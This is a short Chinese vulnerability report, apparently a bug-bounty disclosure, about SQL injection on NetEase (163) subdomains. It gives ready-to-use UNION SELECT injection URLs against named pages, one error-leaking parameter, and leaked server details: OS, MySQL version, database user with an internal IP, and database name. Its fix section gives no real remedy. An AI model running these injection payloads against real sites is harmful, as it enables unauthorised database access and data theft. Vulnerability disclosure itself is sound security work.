简要描述:注射可导致主机相关信息泄露,以及进一步的渗透。望管理员及时修复,以免造成对主机安全影响。 详细说明:http://rainbowlife.163测试数据/chxw2.php?articleID=98%27%20%20%20And%201=2%20UNION%20all%20SELECT%201,2,3,4,5,6,7%20--+a 漏洞 证明: Os:pc-linux-gnu Ver:4.0.26-log Port:3306 User:minisite@10.100.50.23 Base:minisite2007 1、 http://rainbowlife.163测试数据/chxw2.php?articleID=98%27%20%20%20And%201=2%20UNION%20all%20SELECT%201,2,3,4,5,6,7%20--+a 2、http://rainbowlife.163测试数据/chsht2.php?articleID=90' And 1=2 UNION all SELECT 1,2,3,4,5,6,7 --+a 泄露错误信息: 3、http://cards.mail.163测试数据/cards/mviewcard.do ?id=77811' &code=null &key=null 修复方案: 你懂的。 作者 孤狐浪子
查看更多关于网易某分站多些SQL注射漏洞及修复 - 网站安全的详细内容...